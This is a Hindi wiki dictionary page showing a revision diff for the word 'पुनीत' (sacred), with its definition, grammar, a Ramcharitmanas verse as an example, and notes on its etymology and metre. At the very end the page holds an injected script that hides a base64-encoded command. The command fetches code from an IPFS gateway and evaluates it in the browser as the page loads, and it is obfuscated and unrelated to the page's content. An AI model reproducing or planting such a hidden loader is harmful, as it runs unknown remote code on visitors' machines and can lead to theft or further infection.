Difference between revisions of "पुनीत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=पवित्र- जिसमें पवित्रता हो।
+
|हिन्दी=पवित्र- जिसमें पवित्रता हो, पुनीता।
|व्याकरण= [[संज्ञा (व्याकरण)|संज्ञा]], स्त्रीलिंग- पुनीता, [[विशेषण]]
+
|व्याकरण= [[संज्ञा (व्याकरण)|संज्ञा]], स्त्रीलिंग, [[विशेषण]]
|उदाहरण=जो उत्तम और इसीलिए जो पवित्र और प्रशंसनीय माना जाता हो। जैसे- पुनीत-कर्तव्य।
+
|उदाहरण=<poem>प्रात '''पुनीत''' काल प्रभु जागे ।
 +
अरुनचूड़ बर बोलन लागे ॥</poem>
 
|विशेष=व्युत्पत्ति सूचक हिन्दी- पुन, व्युत्पत्ति सूचक संस्कृत- पुण्य। (छन्दशास्त्र) एक सममात्रिक छन्द जिसके प्रत्येक चरण में 15 मात्राएँ होती हैं तथा आदि में सम कल के बाद विषम कल होता है।   
 
|विशेष=व्युत्पत्ति सूचक हिन्दी- पुन, व्युत्पत्ति सूचक संस्कृत- पुण्य। (छन्दशास्त्र) एक सममात्रिक छन्द जिसके प्रत्येक चरण में 15 मात्राएँ होती हैं तथा आदि में सम कल के बाद विषम कल होता है।   
 
|पर्यायवाची=
 
|पर्यायवाची=

Latest revision as of 06:15, 14 February 2011

shabd sandarbh
hindi pavitr- jisamean pavitrata ho, punita.
-vyakaran    sanjna, striliang, visheshan
-udaharan  

prat punit kal prabhu jage .
arunachoo d bar bolan lage ॥

-vishesh    vyutpatti soochak hindi- pun, vyutpatti soochak sanskrit- puny. (chhandashastr) ek samamatrik chhand jisake pratyek charan mean 15 matraean hoti haian tatha adi mean sam kal ke bad visham kal hota hai.
-vilom   
-paryayavachi   
sanskrit
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>